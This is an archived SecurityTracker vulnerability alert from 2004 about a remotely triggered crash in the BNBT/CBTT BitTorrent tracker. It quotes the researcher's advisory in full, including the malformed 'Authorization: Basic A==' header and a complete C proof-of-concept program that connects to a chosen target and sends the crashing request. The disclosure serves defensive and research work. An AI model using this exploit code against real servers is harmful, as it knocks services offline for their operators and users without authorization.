SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   CBTT Vendors:   bnbtusermods.sourceforge.net
CBTT Can Be Crashed By Remote Users Sending Specially Crafted HTTP Basic Authentication Headers
SecurityTracker Alert ID:  1010255
SecurityTracker URL:  http://securitytracker.com/id/1010255
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 22 2004
Impact:   Denial of service via network, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): cbtt75_20040515
Description:   badpack3t of SP Research Labs reported a denial of service vulnerability in CBTT. A remote user can cause the service to crash.

A remote user can reportedly send a specially crafted HTTP Basic Authorization GET request to cause the target service to crash. A demonstration exploit is provided:

Authorization: Basic A==

The report indicates that it may be possible to execute arbitrary code on the target system.

The flaw reportedly resides in 'util.cpp' in the Util_DecodeHTTPAuth() function.

A demonstration exploit is provided in the Source Message.

The original advisory is available at:

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt

Impact:   A remote user can cause the target service to crash.

A remote user may be able to execute arbitrary code [but that was not confirmed in the report].

Solution:   No solution was available at the time of this entry.
Vendor URL:  bnbtusermods.sourceforge.net/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  BNBT BitTorrent Tracker Denial Of Service


Please publish:

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt

Thanks,

----------------------------------------
badpack3t
founder
www.security-protocols.com
----------------------------------------



SP Research Labs Advisory x12
-----------------------------

BNBT BitTorrent Tracker Denial Of Service
-----------------------------------------

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

Date Released - 5.21.2004

------------------------------------
Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python 
BitTorrent tracker to
C++ for speed and efficiency. BNBT also offers many additional features beyond the 
original Python
BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNU 
Lesser
General Public License (LGPL).

--------
Details:

A specifically crafted HTTP GET request which contains 'Authorization: Basic A==' will 
cause the BNBT
server to crash. It may be possible to execute arbitrary code. Previous versions are also 
affected by
this vulnerability.  The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the BNBT server to crash.

--------------
Tested on:
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
    PoC to crash the server
/****************************/

/* BNBT BitTorrent Tracker Denial Of Service

    Versions:
    cbtt75_20040515
    Beta 7.5 Release 2 and prior versions

    Vendors:
    http://bnbt.go-dedicated.com/
    http://bnbteasytracker.sourceforge.net/
    http://sourceforge.net/projects/bnbtusermods/

    The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

    Coded and Discovered by:
    badpack3t <badpack3t@security-protocols.com>
    .:sp research labs:.
    www.security-protocols.com
    5.21.2004

    This PoC will only DoS the server to verify if it is vulnerable.
  */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n 
<badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
		printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 6969;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC